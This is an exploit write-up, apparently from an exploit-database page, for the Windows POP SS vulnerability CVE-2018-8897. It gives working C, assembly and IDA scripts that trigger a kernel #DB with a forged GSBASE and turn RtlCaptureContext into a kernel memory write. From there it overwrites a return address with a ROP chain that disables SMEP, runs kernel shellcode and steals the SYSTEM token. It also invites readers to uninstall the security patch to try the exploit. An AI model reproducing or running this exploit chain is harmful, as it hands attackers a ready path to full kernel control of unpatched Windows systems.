at-ring-0-using CVE-2018-8897 – Arbitrary Code Execution

Authors:Can Bölük            Risk:High

CVE:CVE-2018-8897           0day:Arbitrary Code Execution 

0day -id:0DAY-176182         Date:2018-05-15


Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.

KVA Shadowing should be disabled and the relevant security update should be uninstalled.
This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.

0x0: Setting Up the Basics

The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time.

However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode.

We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised.

As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.

All of this can be done in a few lines like shown below:

#include <Windows.h>
#include <iostream>
void main()
  static DWORD g_SavedSS = 0;
    mov ax, ss
    mov word ptr [ g_SavedSS ], ax
  CONTEXT Ctx = { 0 };
  Ctx.Dr0 = ( DWORD ) &g_SavedSS;
  Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 );
  SetThreadContext( HANDLE( -2 ), &Ctx );
  PVOID FakeGsBase = ...;
    mov eax, FakeGsBase                     ; Set eax to fake gs base
    push 0x23
    push X64_End
    push 0x33
    push X64_Start
    __emit 0xf3                             ; wrgsbase eax
    __emit 0x0f
    __emit 0xae
    __emit 0xd8
    ; Vulnerability
    mov ss, word ptr [ g_SavedSS ]          ; Defer debug exception
    int 3                                   ; Execute with interrupts disabled

This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit.

Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx.

We can utilize a small IDA script to step to relevant parts faster:

#include <idc.idc>
static main() 
  Message( "--- Step Till Next GS ---\n" );
  while( 1 )
    auto Disasm = GetDisasmEx( GetEventEa(), 1 );
    if ( strstr( Disasm, "gs:" ) >= Disasm )
    GetDebuggerEvent( WFNE_SUSP, -1 );

0x1: Fixing the KPCR Data

Here are the few cases we have to modify GSBASE contents to pass through successfully:


MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h

Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80


MEMORY:FFFFF8018C20DB5F mov     rax, gs:188h
MEMORY:FFFFF8018C20DB68 bt      dword ptr [rax+74h], 8

Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.


MEMORY:FFFFF8018C12A4D8 mov     rax, gs:qword_188
MEMORY:FFFFF8018C12A4E1 mov     rax, [rax+0B8h]

This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it.

MEMORY:FFFFF8018C12A0AC mov     rax, gs:qword_20
MEMORY:FFFFF8018C12A0B5 mov     ecx, [rax+148h]

0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it.


This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do?

There’s a weird check in the middle of the function:

char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3)
  if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) )
    *v5 = 5;
    result = 1;
    *v3 = 0xFFFFFFFFFFFFFFFFi64;
    *v4 = 0xFFFF800000000000i64;
  return result;

Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved.

RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException.


We are finally here. Here’s the last thing we need to fix:

MEMORY:FFFFF8018C1FB94A mov     rcx, gs:qword_20
MEMORY:FFFFF8018C1FB953 mov     rcx, [rcx+62C0h]
MEMORY:FFFFF8018C1FB95A call    RtlCaptureContext

Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now.

0x2:  and Write|What|Where

And there we go, sweet sweet blue screen of victory!

Now that everything works, how can we exploit it?

The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time.

I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until  KeBugCheckEx is hit:

#include <idc.idc>
static main() 
  Message( "--- Logging Points of Interest ---\n" );
  while( 1 )
    auto IP = GetEventEa();
    auto Disasm = GetDisasmEx( IP, 1 );
      ( strstr( Disasm, "gs:" ) >= Disasm ) ||
      ( strstr( Disasm, "jmp r" ) >= Disasm ) ||
      ( strstr( Disasm, "call r" ) >= Disasm ) ||
      ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ||
      ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm )
    Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm );
    GetDebuggerEvent( WFNE_SUSP, -1 );
    if( IP == ... )

To my disappointment, there is no convenient jumps or calls. The whole output is:

- KiDebugTrapOrFault (+3d):                   test    word ptr gs:278h, 40h
- sub_FFFFF8018C207019 (+5):                  ldmxcsr dword ptr gs:180h
-- KiExceptionDispatch (+5f):                 mov     rax, gs:188h
--- KiDispatchException (+48):                mov     rax, gs:188h
--- KiDispatchException (+5c):                inc     gs:5D30h
---- KeCopyLastBranchInformation (+38):       mov     rax, gs:20hh
---- KeQueryCurrentStackInformation (+3b):    mov     rax, gs:188h
---- KeQueryCurrentStackInformation (+44):    mov     rcx, gs:1A8h
--- KeBugCheckEx (+1a):                       mov     rcx, gs:20h

This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.

I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses:


After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext.

How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit).

However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do.

To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made.

.text:000000014017595F                 mov     rcx, gs:20h
.text:0000000140175968                 add     rcx, 100h
.text:000000014017596F                 call    KiSaveProcessorControlState
.text:0000000140175C80 KiSaveProcessorControlState proc near   ; CODE XREF: KeBugCheckEx+3Fp
.text:0000000140175C80                                         ; KeSaveStateForHibernate+ECp ...
.text:0000000140175C80                 mov     rax, cr0
.text:0000000140175C83                 mov     [rcx], rax
.text:0000000140175C86                 mov     rax, cr2
.text:0000000140175C89                 mov     [rcx+8], rax
.text:0000000140175C8D                 mov     rax, cr3
.text:0000000140175C90                 mov     [rcx+10h], rax
.text:0000000140175C94                 mov     rax, cr4
.text:0000000140175C97                 mov     [rcx+18h], rax
.text:0000000140175C9B                 mov     rax, cr8
.text:0000000140175C9F                 mov     [rcx+0A0h], rax

We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4.

To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant.

Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context.Xmm13 – Prcb.Context.Xmm15, write over it.

Thread logic will be like the following:

volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context );
while ( !Ctx->Rsp );                                      // Wait for RtlCaptureContext to be called once so we get leaked RSP
uint64_t StackInitial = Ctx->Rsp;
while ( Ctx->Rsp == StackInitial );                       // Wait for it to be called another time so we get the stack pointer difference 
                                                          // between sequential KiDebugTrapOrFault
StackDelta = Ctx->Rsp - StackInitial;
PredictedNextRsp = Ctx->Rsp + StackDelta;                 // Predict next RSP value when RtlCaptureContext is called
uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8;      // Predict where the return pointer will be located at
NextRetPtrStorage &= ~0xF;
*( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13;  
                                                          // Make RtlCaptureContext write XMM13-XMM15 over it

Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction.

We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode.

The final chain will look something like:

-- &retn;                (fffff80372e9502d)
-- &retn;                (fffff80372e9502d)
-- &pop rcx; retn;       (fffff80372ed9122)
-- cr4_nosmep            (00000000000506f8)
-- &mov cr4, rcx; retn;  (fffff803730045c7)
-- &KernelShellcode      (00007ff613fb1010)

In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below:

NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0;
using fnIRetToVulnStub = void( * )  ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup );
  0x0F, 0x22, 0xE1,    // mov cr4, rcx ; cr4 = original cr4
  0x48, 0x89, 0xD4,    // mov rsp, rdx ; stack = isr stack
  0x4C, 0x89, 0xC1,    // mov rcx, r8  ; rcx = ContextBackup
  0xFB,                // sti          ; enable interrupts
  0x48, 0xCF           // iretq        ; interrupt return
NON_PAGED_CODE void KernelShellcode()
  __writedr( 7, 0 );
  uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 );
  __writecr4( Cr4Old & ~( 1 << 20 ) );
  uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38;
  __writedr( 2, StackDelta );
  __writedr( 3, IsrStackIterator );
  // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault
  while ( 
    ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 &&
    ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF )
    __rollback_isr( IsrStackIterator );
    // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta
    if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 )
      fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap
      fffff00e`d7a1bc40 0000000000000010 
      fffff00e`d7a1bc48 0000000000000002 
      fffff00e`d7a1bc50 fffff00ed7a1bc68 
      fffff00e`d7a1bc58 0000000000000000 
      fffff00e`d7a1bc60 0000000000000014 
      fffff00e`d7a1bc68 00007ff7e2261e95 --
      fffff00e`d7a1bc70 0000000000000033 
      fffff00e`d7a1bc78 0000000000000202 
      fffff00e`d7a1bc80 000000ad39b6f938 
      IsrStackIterator = IsrStackIterator + 0x30;
    IsrStackIterator -= StackDelta;
  PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) );
  Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) );
  // ------ KERNEL CODE ------
  // ------ KERNEL CODE ------
  ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1;
  ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup );

We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete!

Let’s make a simple demo stealing the System token:

uint64_t SystemProcess = *k_PsInitialSystemProcess;
uint64_t CurrentProcess = k_PsGetCurrentProcess();
uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess );
uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess );
for ( int i = 0; i < 0x500; i+= 0x8 )
  uint64_t Val = *( uint64_t * ) ( CurrentProcess + i );
  Val &= ~0xF;
  if ( Val == CurrentToken )
    *( uint64_t * ) ( CurrentProcess + i ) = SystemToken;
k_PsDereferencePrimaryToken( CurrentToken );
k_PsDereferencePrimaryToken( SystemToken );

Complete implementation of the concept can be found at:



P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!

P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code:

Leave a Reply